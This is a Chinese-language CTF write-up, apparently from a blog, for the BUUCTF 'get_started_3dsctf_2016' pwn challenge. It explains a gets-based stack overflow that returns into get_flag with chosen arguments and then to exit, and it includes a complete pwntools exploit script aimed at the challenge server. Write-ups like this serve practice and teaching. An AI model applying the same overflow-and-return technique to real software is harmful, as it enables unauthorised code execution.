BUUCTF[get_started_3dsctf_2016]

步骤

使用checksec查看

使用ida打开,发现存在gets函数

溢出只需要56个字节

搜索发现有个get_flag函数,满足条件会执行打开flag.txt的指令

该函数地址为0x080489A0

我们可以溢出后 覆盖返回到get_flag函数,并且传入符合判断的值

a1的值814536271就是0x308CD64F

由于该题目没开启标准输入输出,于是我们得让函数正常退出来得到回显

exit函数地址0x0804E6A0

exp

python 复制代码
from pwn import *

get_flag=0x080489A0
exit_addr=0x0804E6A0
a1=0x308CD64F
a2=0x195719D1

p=remote('node5.buuoj.cn',28150)
#p=process('./get_started_3dsctf_2016')
context.log_level='debug'
sleep(0.1)

payload = b'a'*56
payload += p32(get_flag)+ p32(exit_addr) + p32(a1) + p32(a2)

p.sendline(payload)
p.interactive()
相关推荐
酿情师19 分钟前
PHP 反序列化漏洞与 POP 链详解:网络安全小白从零入门
android·web安全·php
攻城狮在此35 分钟前
华三交换机端口隔离配置(VLAN内二层互访隔离)
网络·安全
arvin_xiaoting36 分钟前
OpenClaw学习总结_IV_认证与安全_4:Multi-Account Patterns详解
人工智能·学习·安全
小羽网安40 分钟前
Linux 服务器如何进行安全加固?
linux·服务器·安全
EasyGBS1 小时前
国标GB28181算法算力平台EasyGBS筑牢应急管理与安全生产防控防线
安全
枫叶林FYL1 小时前
【Python高级工程与架构实战】项目五:生产级LLM Agent框架:基于PydanticAI的类型安全企业级实现
python·安全·架构
乾元1 小时前
《硅基之盾》番外篇一:时间的折叠——AI 时代下的物理隔离与传统工控(ICS/OT)安全
网络·人工智能·安全·网络安全·架构
步步为营DotNet2 小时前
探索.NET 11 中.NET Aspire 在云原生应用可观测性与安全的深度融合
安全·云原生·.net
凤年徐3 小时前
OpenClaw深度解析:“数字龙虾”何以引爆AI Agent时代?安全危机与未来之战
人工智能·安全
飞翔的SA3 小时前
EmDash:WordPress 精神继承者,重构内容管理系统(CMS) 安全与现代架构
安全·重构·架构·cms